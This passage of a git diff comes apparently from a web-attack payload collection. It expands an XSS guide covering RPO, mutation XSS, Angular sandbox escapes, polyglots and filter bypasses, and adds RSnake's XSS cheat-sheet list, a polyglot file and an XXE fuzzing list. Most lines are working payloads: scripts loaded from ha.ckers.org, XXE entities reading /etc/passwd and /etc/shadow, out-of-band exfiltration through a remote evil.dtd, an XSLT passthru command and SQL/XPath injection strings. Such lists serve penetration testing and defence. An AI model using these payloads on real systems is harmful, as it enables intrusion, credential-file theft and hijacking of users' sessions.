The Meta element forces IE’s document mode into IE7 compat which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert.
|
||||||
|
|
||||||
A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.
|
A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.
|
||||||
|
|
||||||
@ -220,7 +220,7 @@ From : http://www.thespanner.co.uk/2014/03/21/rpo/
|
|||||||
<listing id=x><img src=1 onerror=alert(1)></listing>
|
<listing id=x><img src=1 onerror=alert(1)></listing>
|
||||||
<script>alert(document.getElementById('x').innerHTML)</script>
|
<script>alert(document.getElementById('x').innerHTML)</script>
|
||||||
```
|
```
|
||||||
IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute.
|
IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute.
|
||||||
|
|
||||||
|
|
||||||
## XSS in Angular
|
## XSS in Angular
|
||||||
@ -265,8 +265,8 @@ Angular 1.3.20
|
|||||||
Angular 1.3.19
|
Angular 1.3.19
|
||||||
```
|
```
|
||||||
{{
|
{{
|
||||||
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
|
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
|
||||||
$eval('x=alert(1)//');
|
$eval('x=alert(1)//');
|
||||||
}}
|
}}
|
||||||
```
|
```
|
||||||
|
|
||||||
@ -281,8 +281,8 @@ Angular 1.3.1 - 1.3.2
|
|||||||
```
|
```
|
||||||
{{
|
{{
|
||||||
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
|
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
|
||||||
'a'.constructor.prototype.charAt=''.valueOf;
|
'a'.constructor.prototype.charAt=''.valueOf;
|
||||||
$eval('x=alert(1)//');
|
$eval('x=alert(1)//');
|
||||||
}}
|
}}
|
||||||
```
|
```
|
||||||
|
|
||||||
@ -347,12 +347,27 @@ Polyglot XSS - Ashar Javed
|
|||||||
|
|
||||||
Polyglot XSS - Mathias Karlsson
|
Polyglot XSS - Mathias Karlsson
|
||||||
```
|
```
|
||||||
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
|
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
|
||||||
```
|
```
|
||||||
|
|
||||||
Polyglot XSS - Rsnake
|
Polyglot XSS - Rsnake
|
||||||
```
|
```
|
||||||
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
|
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
|
||||||
|
```
|
||||||
|
|
||||||
|
Polyglot XSS - Daniel Miessler
|
||||||
|
```
|
||||||
|
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
|
||||||
|
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
|
||||||
|
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
|
||||||
|
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
|
||||||
|
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
|
||||||
|
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
|
||||||
|
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
|
||||||
|
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
|
||||||
|
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
|
||||||
|
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
|
||||||
|
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
@ -385,7 +400,7 @@ Bypass quotes in mousedown event
|
|||||||
You can bypass a single quote with ' in an on mousedown event handler
|
You can bypass a single quote with ' in an on mousedown event handler
|
||||||
```
|
```
|
||||||
|
|
||||||
Bypass dot filter
|
Bypass dot filter
|
||||||
```
|
```
|
||||||
<script>window['alert'](document['domain'])<script>
|
<script>window['alert'](document['domain'])<script>
|
||||||
```
|
```
|
||||||
@ -515,7 +530,7 @@ Bypass using unicode converted to uppercase
|
|||||||
ſ (%c5%bf) .toUpperCase() => S
|
ſ (%c5%bf) .toUpperCase() => S
|
||||||
K (%E2%84%AA).toLowerCase() => k
|
K (%E2%84%AA).toLowerCase() => k
|
||||||
|
|
||||||
<ſvg onload=... > become <SVG ONLOAD=...>
|
<ſvg onload=... > become <SVG ONLOAD=...>
|
||||||
<ıframe id=x onload=>.toUpperCase() become <IFRAME ID=X ONLOAD=>
|
<ıframe id=x onload=>.toUpperCase() become <IFRAME ID=X ONLOAD=>
|
||||||
```
|
```
|
||||||
|
|
||||||
@ -550,7 +565,7 @@ Exotic payloads
|
|||||||
```
|
```
|
||||||
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
|
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
|
||||||
<script>$=1,alert($)</script>
|
<script>$=1,alert($)</script>
|
||||||
<script ~~~>confirm(1)</script ~~~>
|
<script ~~~>confirm(1)</script ~~~>
|
||||||
<script>$=1,\u0061lert($)</script>
|
<script>$=1,\u0061lert($)</script>
|
||||||
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
|
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
|
||||||
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
|
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
|
||||||
@ -570,4 +585,4 @@ Exotic payloads
|
|||||||
* http://blog.innerht.ml/rpo-gadgets/
|
* http://blog.innerht.ml/rpo-gadgets/
|
||||||
* http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite
|
* http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite
|
||||||
* http://d3adend.org/xss/ghettoBypass
|
* http://d3adend.org/xss/ghettoBypass
|
||||||
* http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
|
* http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
|
||||||
|
74
XSS injection/RSNAKE_XSS.txt
Normal file
74
XSS injection/RSNAKE_XSS.txt
Normal file
@ -0,0 +1,74 @@
|
|||||||
|
# credit to rsnake
|
||||||
|
<SCRIPT>alert('XSS');</SCRIPT>
|
||||||
|
'';!--"<XSS>=&{()}
|
||||||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||||
|
<IMG SRC="javascript:alert('XSS');">
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||||
|
<IMG SRC=javascript:alert("XSS")>
|
||||||
|
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||||||
|
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||||
|
SRC=
<IMG 6;avascript:alert('XSS')>
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
<IMG SRC="jav ascript:alert('XSS');">
|
||||||
|
<IMG SRC="jav	ascript:alert('XSS');">
|
||||||
|
<IMG SRC="jav
ascript:alert('XSS');">
|
||||||
|
<IMG SRC="jav
ascript:alert('XSS');">
|
||||||
|
<IMG SRC="  javascript:alert('XSS');">
|
||||||
|
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
|
||||||
|
<IMG SRC="javascript:alert('XSS')"
|
||||||
|
<SCRIPT>a=/XSS/
|
||||||
|
\";alert('XSS');//
|
||||||
|
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||||
|
<BODY BACKGROUND="javascript:alert('XSS')">
|
||||||
|
<BODY ONLOAD=alert('XSS')>
|
||||||
|
<IMG DYNSRC="javascript:alert('XSS')">
|
||||||
|
<IMG LOWSRC="javascript:alert('XSS')">
|
||||||
|
<BGSOUND SRC="javascript:alert('XSS');">
|
||||||
|
<BR SIZE="&{alert('XSS')}">
|
||||||
|
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||||
|
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||||
|
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
||||||
|
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||||
|
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
||||||
|
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||||
|
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||||
|
<IMG SRC="mocha:[code]">
|
||||||
|
<IMG SRC="livescript:[code]">
|
||||||
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
||||||
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||||
|
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
|
||||||
|
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||||||
|
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||||
|
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||||
|
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||||
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||||
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||||
|
<DIV STYLE="width: expression(alert('XSS'));">
|
||||||
|
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||||
|
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||||
|
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||||
|
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
||||||
|
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||||
|
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||||
|
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||||
|
<BASE HREF="javascript:alert('XSS');//">
|
||||||
|
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||||
|
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
||||||
|
getURL("javascript:alert('XSS')")
|
||||||
|
a="get";
|
||||||
|
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
|
||||||
|
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
|
||||||
|
<HTML><BODY>
|
||||||
|
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||||
|
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||||
|
<? echo('<SCR)';
|
||||||
|
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||||||
|
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
||||||
|
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
@ -1,13 +0,0 @@
|
|||||||
XSS with javascript:
|
|
||||||
```
|
|
||||||
javascript:prompt(1)
|
|
||||||
|
|
||||||
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
|
|
||||||
|
|
||||||
javascript:confirm(1)
|
|
||||||
```
|
|
||||||
|
|
||||||
XSS with data:
|
|
||||||
```
|
|
||||||
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
|
|
||||||
```
|
|
14
XSS injection/XSS_Polyglots.txt
Normal file
14
XSS injection/XSS_Polyglots.txt
Normal file
@ -0,0 +1,14 @@
|
|||||||
|
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||||
|
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
|
||||||
|
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
|
||||||
|
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
|
||||||
|
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
|
||||||
|
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
|
||||||
|
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
|
||||||
|
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
|
||||||
|
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
|
||||||
|
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
|
||||||
|
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
|
||||||
|
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
|
||||||
|
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
|
||||||
|
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
|
48
XXE injections/XXE_Fuzzing.txt
Normal file
48
XXE injections/XXE_Fuzzing.txt
Normal file
@ -0,0 +1,48 @@
|
|||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||||
|
<!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
|
||||||
|
<!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><test></test>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com:80" >]><foo>&xxe;</foo>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example:443" >]>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
|
||||||
|
<test></test>
|
||||||
|
<![CDATA[<test></test>]]>
|
||||||
|
&foo;
|
||||||
|
%foo;
|
||||||
|
count(/child::node())
|
||||||
|
x' or name()='username' or 'x'='y
|
||||||
|
<name>','')); phpinfo(); exit;/*</name>
|
||||||
|
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
||||||
|
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
|
||||||
|
<foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
|
||||||
|
<foo><![CDATA[' or 1=1 or ''=']]></foo>
|
||||||
|
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
||||||
|
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||||
|
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||||
|
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||||
|
<xml SRC="xsstest.xml" ID=I></xml>
|
||||||
|
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
|
||||||
|
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
|
||||||
|
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><script>alert(123)</script></xsl:template></xsl:stylesheet>
|
||||||
|
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:copy-of select="document('/etc/passwd')"/></xsl:template></xsl:stylesheet>
|
||||||
|
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:value-of select="php:function('passthru','ls -la')"/></xsl:template></xsl:stylesheet>
|
||||||
|
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
|
||||||
|
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
|
||||||
|
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
|
||||||
|
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com/text.txt" >]>
|
||||||
|
<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]>
|
||||||
|
<!ENTITY % int "<!ENTITY % trick SYSTEM 'http://127.0.0.1:80/?%file;'> "> %int;
|
||||||
|
<!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///etc/issue"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
|
||||||
|
<!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///c:/boot.ini"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
|
Loading…
Reference in New Issue
Block a user